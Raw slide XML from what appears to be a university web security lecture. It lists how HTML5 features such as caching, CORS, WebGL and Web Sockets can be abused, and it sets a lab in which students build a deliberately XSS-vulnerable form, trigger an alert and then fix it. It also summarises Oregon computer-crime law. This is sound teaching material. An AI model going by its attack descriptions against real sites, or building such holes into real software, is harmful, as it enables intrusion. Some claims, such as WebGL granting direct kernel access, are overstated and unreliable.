                        <a:t>Improved style and layout support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287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Device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APIs to support direct device access such as geo-location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287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="120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Background JavaScript execution and caching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132">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Multimedia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Native support for video and audio removing the need for plugins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287">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Offline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Storing data locally and allowing offline data access.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132">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/>
                        <a:t>Graphics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2D and with direct 3D modelling using canvas and WebGL API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779">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0"/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APIs to support cross communication such as Web Sockets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725730"/>
      </p:ext>
    </p:extLst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– Benefits to the Malicious Actor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52157"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="895350"/>
          <a:ext cx="8305800" cy="35052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Malicious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HTML5 Caching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Cache can be poisoned via DNS spoofing/poisoning attacks. These would allow a malicious cache to override live internet webpage allowing malicious page to be executed even when the user is subsequently connected to a trusted network.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CORS/XML HTTP Requests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Cross-origin resource sharing - allows for CSRF attacks against websites that have not yet caught up with HTML5 specs.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History API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Can be intercepted and subverted for web site spoofing and man in the middle attacks.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Web Notifications API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Fake notifications to steal credentials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6160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Web Worker threads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Shared Workers can make obfuscation several factors more sophisticated as they can communicate across top level document contexts.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567965"/>
      </p:ext>
    </p:extLst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– Benefits to the Malicious Actor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281230"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="895350"/>
          <a:ext cx="8305800" cy="33985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Malicious Benefit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WebGL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Used to support 3d graphics within the browser. Allows direct access to kernel drivers and CPU and GPU hardware allowing for exploits which can take system and HW control.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Web Storage APIs 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Possibility of DNS spoofing allowing access to persisted data, SQL Injection possible if client code unsafe.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Web Sockets API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Makes network topology and port scanning possible.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Audio and Video APIs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Possible to introduce vulnerability in data stream before injecting into an already vulnerable component.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HTML and RDFa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Possible to lure search engines and other software to HTML content for purposes of serving spam.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SVG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Scalable Vector Graphics - It is now possible to nest SVG and HTML objects recursively. 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Web Open Font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effectLst/>
                        </a:rPr>
                        <a:t>Fonts allow for customization of the characters displayed allowing spammers to send out text which passes through spam/phish filters but when rendered displays the spammers intent.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293094"/>
      </p:ext>
    </p:extLst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774404" y="3035611"/>
            <a:ext cx="2092996" cy="2092996"/>
            <a:chOff x="3317141" y="4619276"/>
            <a:chExt cx="4800600" cy="4800600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4120" name="Picture 24" descr="http://zitek.com/wp-content/uploads/2014/02/computer-laptop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141" y="4619276"/>
              <a:ext cx="4800600" cy="480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1" name="Picture 25" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WECERLUW\HTML5_Logo_256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5467350"/>
              <a:ext cx="1956971" cy="1956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1" name="Picture 5" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MWKXX71P\web-server-icon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9974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– New Security Risks</a:t>
            </a:r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2142313"/>
            <a:ext cx="2188149" cy="29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431505" y="1052597"/>
            <a:ext cx="308868" cy="379549"/>
            <a:chOff x="7406193" y="2196598"/>
            <a:chExt cx="669588" cy="732953"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="40000"/>
              <a:lumOff val="60000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Flowchart: Delay 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="7544049" y="2397819"/>
              <a:ext cx="393876" cy="669588"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartDelay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5E6A7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7534274" y="2196598"/>
              <a:ext cx="413427" cy="396554"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse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600">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3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06" y="2142313"/>
            <a:ext cx="1751025" cy="29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Line Callout 1 (Accent Bar) 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1935956" y="1508750"/>
            <a:ext cx="1657053" cy="501660"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14981"/>
              <a:gd name="adj2" fmla="val 1669"/>
              <a:gd name="adj3" fmla="val -11137"/>
              <a:gd name="adj4" fmla="val -16798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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A7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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>New APIs and lack of security causes increased security defects in Apps and websites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Line Callout 1 (Accent Bar) 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1437384" y="2490368"/>
            <a:ext cx="1763056" cy="631576"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20305"/>
              <a:gd name="adj2" fmla="val 98583"/>
              <a:gd name="adj3" fmla="val -11446"/>
              <a:gd name="adj4" fmla="val 114472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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apps</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A71"/>
              </a:solidFill>
            </a:endParaRP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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Apps provided outside of app store certification programs directly by vendors. Malware finding its way into existing app stores</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5E6A71"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Line Callout 1 (Accent Bar) 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3770867" y="2490368"/>
            <a:ext cx="1627936" cy="401243"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46991"/>
              <a:gd name="adj2" fmla="val 1525"/>
              <a:gd name="adj3" fmla="val -7159"/>
              <a:gd name="adj4" fmla="val -22590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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Browsers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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML5 Exploits introduced and  new APIs with weak security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line Callout 1 (Accent Bar) 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6179119" y="3707553"/>
            <a:ext cx="1633940" cy="534124"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20085"/>
              <a:gd name="adj2" fmla="val 943"/>
              <a:gd name="adj3" fmla="val 59102"/>
              <a:gd name="adj4" fmla="val -34106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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Offline storage and Caching</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A7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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Personal data could accessed. Possible storage of malicious content. Possible redirection.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line Callout 1 (Accent Bar) 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6179119" y="4333164"/>
            <a:ext cx="1688829" cy="534124"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20085"/>
              <a:gd name="adj2" fmla="val 966"/>
              <a:gd name="adj3" fmla="val 23079"/>
              <a:gd name="adj4" fmla="val -34335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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Device and Graphic APIs</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A7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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Powerful new APIs allow device access from the browser and could be exploited. (e.g. Web GL).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line Callout 1 (Accent Bar) 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6530096" y="1433140"/>
            <a:ext cx="1408416" cy="504135"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18974"/>
              <a:gd name="adj2" fmla="val 1669"/>
              <a:gd name="adj3" fmla="val 5232"/>
              <a:gd name="adj4" fmla="val -26633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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web sites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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious web sites take advantage of security holes introduced by HTML5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line Callout 1 (Accent Bar) 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="4538729"/>
            <a:ext cx="2438648" cy="457544"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20305"/>
              <a:gd name="adj2" fmla="val 98583"/>
              <a:gd name="adj3" fmla="val -37901"/>
              <a:gd name="adj4" fmla="val 150337"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Video and Audio APIs</a:t>
            </a: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chemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Possibility of introduced exploits in the media stream due defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Line Callout 1 (Accent Bar) 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6178210" y="2675262"/>
            <a:ext cx="1787756" cy="432697"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19353"/>
              <a:gd name="adj2" fmla="val 919"/>
              <a:gd name="adj3" fmla="val 200546"/>
              <a:gd name="adj4" fmla="val -56227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>
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Origin Resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Increased sharing allowing possible misuse compromising security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Line Callout 1 (Accent Bar) 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6179119" y="3190657"/>
            <a:ext cx="1717837" cy="382808"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18974"/>
              <a:gd name="adj2" fmla="val 978"/>
              <a:gd name="adj3" fmla="val 100981"/>
              <a:gd name="adj4" fmla="val -41653"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web sockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A7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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vector for Data Loss, use by malware and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attacks</a:t>
            </a:r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1078896048"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1523300" y="730106"/>
          <a:ext cx="915100" cy="774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100" name="Picture 4" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5HD8YZZ1\malware[1]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77" y="1019639"/>
            <a:ext cx="621051" cy="62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1861950" y="3344737"/>
            <a:ext cx="1805064" cy="1209070"/>
            <a:chOff x="4538404" y="4538729"/>
            <a:chExt cx="4438784" cy="2800350"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4104" name="Picture 8" descr="C:\Users\root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MWKXX71P\HP_touch_pad_Tablet_1[1]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8404" y="4538729"/>
              <a:ext cx="4438784" cy="280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root\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WECERLUW\HTML5_Logo_256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514" y="5143500"/>
              <a:ext cx="1442137" cy="1442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4216598"/>
      </p:ext>
    </p:extLst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Reflected XSS – OPTION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200" dirty="0"/>
              <a:t>Create a web application which draws a page with a form.   The form is a single text input field and submit button.   When the submit button is pushed, it should just display the submitted text back to you.   It should submit the forum using a GET request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use any language for the web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Perl CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Python CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Shell  CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>C CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Whatever… </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Visit your web app with your browser and execute reflected XSS attack, causing a browser dialog (alert) to occur. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Make a copy of your web app which is resistant to this XSS attack.   Confirm that the attack now fails.   Hint: A good programmer is lazy and does not re-invent the wheel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Zip up the source of the two app versions and submit. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1463203190"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med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– Reflected XSS – Option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200" dirty="0"/>
              <a:t>Instead of creating your own web application use an existing application that may be vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>If you don’t have examples at hand, check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://web.engr.oregonstate.edu/cgi-bin/cgiwrap/dmcgrath/classes/15W/dada/index.cgi?hw=lab1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use Firefox with Tamper Data to figure out the issue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>We will focus on the XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Use the existing language for the web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Python CGI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Visit your web app with your browser and execute reflected XSS attack, causing a browser dialog (alert) to occur. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Work with the owner of the code to mitigate the issue and ensure that the application is now secure. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Update the application on web.engr.oregonstate.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Web7 lecturer will verify that the application is secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="388627115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123950"/>
            <a:ext cx="2514600" cy="33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latinLnBrk="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>What is Computer Crime Under Oregon Law?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" latinLnBrk="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Oregon's computer crime statute identifies three main categories of computer crimes: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Knowingly accessing or using a computer or network (or attempting to do so) for the purpose of fraud; to obtain money, property, or services; or to commit theft of proprietary information.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Knowingly and without authorization altering, destroying, or damaging any computer, network, software, data, etc. (or attempting to do so).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Knowingly and without authorization using or accessing a computer or network (or attempting to do so).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" latinLnBrk="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>While the first two offenses may be charged as a Class C felony, the third offense is charged as a Class A misdemeanor. Conviction on either charge may result in a prison sentence, as much as one year for a Class A misdemeanor and as much as five years for a Class C felony.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="http://data1.whicdn.com/images/69528720/larg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7600" y="1073151"/>
            <a:ext cx="13843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557872"/>
      </p:ext>
    </p:extLst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SESSION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Have a good night!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="792975727"/>
      </p:ext>
    </p:extLst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cedric@mcafee.com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45733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Delivery mechanism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Always delivers on time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56872999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termid.files.wordpress.com/2010/12/asdf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09600" y="796328"/>
            <a:ext cx="10058895" cy="434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– HTTP/HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2058" name="Picture 10" descr="https://upload.wikimedia.org/wikipedia/commons/5/5c/INdustrial_piping.jpg" hidden="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28" y="2724150"/>
            <a:ext cx="2916472" cy="189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gg Minder" hidden="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819150"/>
            <a:ext cx="2971800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" hidden="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809750"/>
            <a:ext cx="25431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43199" y="4324349"/>
            <a:ext cx="5410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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP is the foundation of data communication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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for the World Wide Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="http://www.websailer.com/wp-content/uploads/2013/07/www_image.jpg" hidden="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123910"/>
            <a:ext cx="25908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betanews.com/wp-content/uploads/2014/05/m2m-graphic1-2013-01-564x317_contentfullwidth.jpg" hidden="1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76350"/>
            <a:ext cx="6781800" cy="381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23853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WEB – Once upon a time…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://media.cmgdigital.com/shared/img/photos/2013/04/16/81/3c/Mosiac-S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895350"/>
            <a:ext cx="5562600" cy="394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5179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CalPoly - Template">
  <a:themeElements>
    <a:clrScheme name="McAfee 2012-2013">
      <a:dk1>
        <a:srgbClr val="5E6A71"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="B71234"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="5E6A71"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DD6B30"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="0074A8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="7B4180"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="69A23B"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="4796C9"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="005485"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Office Theme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71234"/>
        </a:solidFill>
      </a:spPr>
      <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:lnSpc>
            <a:spcPct val="95000"/>
          </a:lnSpc>
          <a:defRPr sz="800" dirty="0">
            <a:solidFill>
              <a:srgbClr val="5E6A7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rgbClr val="5E6A71"/>
            </a:solidFill>
            <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0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9B79A9E2FEF042B274AEF122A175F0" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="558fa22d1cb34ef45a0ab8bddcf5cf6b">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="0c3c6c64-b7e5-4b70-8832-dc5f279affca" xmlns:ns3="64c4ccde-1f6c-4d32-9ee6-419e69644c5d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="e2d7322bc8d8c5f3c9800d32f04caca9" ns2:_="" ns3:_="">
    <xsd:import namespace="0c3c6c64-b7e5-4b70-8832-dc5f279affca"/>
    <xsd:import namespace="64c4ccde-1f6c-4d32-9ee6-419e69644c5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c6c64-b7e5-4b70-8832-dc5f279aff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c4ccde-1f6c-4d32-9ee6-419e69644c5d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9F26E-672F-4653-A757-6196240B0C0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8298F2D-4ED8-4E90-9206-6356D336A7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49DEB8-85BD-4597-AE60-53F7B5173D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3c6c64-b7e5-4b70-8832-dc5f279affca"/>
    <ds:schemaRef ds:uri="64c4ccde-1f6c-4d32-9ee6-419e69644c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CalPoly - Template</Template>
  <TotalTime>38758</TotalTime>
  <Words>3907</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>615</Paragraphs>
  <Slides>61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Amienne</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Franklin Gothic Book</vt:lpstr>
      <vt:lpstr>Franklin Gothic Medium</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>CalPoly - Template</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Who’s this guy?!</vt:lpstr>
      <vt:lpstr>Agenda – SESSION 1</vt:lpstr>
      <vt:lpstr>Agenda – SESSION 2</vt:lpstr>
      <vt:lpstr>WEEK [7] OBJECTIVES</vt:lpstr>
      <vt:lpstr>Reminder</vt:lpstr>
      <vt:lpstr>Web Delivery mechanism</vt:lpstr>
      <vt:lpstr>WEB – HTTP/HTML</vt:lpstr>
      <vt:lpstr>EVOLUTION OF THE WEB – Once upon a time…</vt:lpstr>
      <vt:lpstr>EVOLUTION OF THE WEB</vt:lpstr>
      <vt:lpstr>EVOLUTION OF WEB-BASED MALWARE DELIVERY</vt:lpstr>
      <vt:lpstr>WEB browser 1.0</vt:lpstr>
      <vt:lpstr>WEB browser 2.0</vt:lpstr>
      <vt:lpstr>Injection POINTS</vt:lpstr>
      <vt:lpstr>User-LEVEL Attacks</vt:lpstr>
      <vt:lpstr>Social Engineering</vt:lpstr>
      <vt:lpstr>THE common WEB USER – A SITTING DUCK?</vt:lpstr>
      <vt:lpstr>User-LEVEL attacks</vt:lpstr>
      <vt:lpstr>PHISHING</vt:lpstr>
      <vt:lpstr>SEO Poisoning</vt:lpstr>
      <vt:lpstr>Fake Updates &amp; FAKE AV</vt:lpstr>
      <vt:lpstr>WYSIWYG… or NOT</vt:lpstr>
      <vt:lpstr>SOCIAL MEDIA - ATTACKS</vt:lpstr>
      <vt:lpstr>malvertising</vt:lpstr>
      <vt:lpstr>malvertising</vt:lpstr>
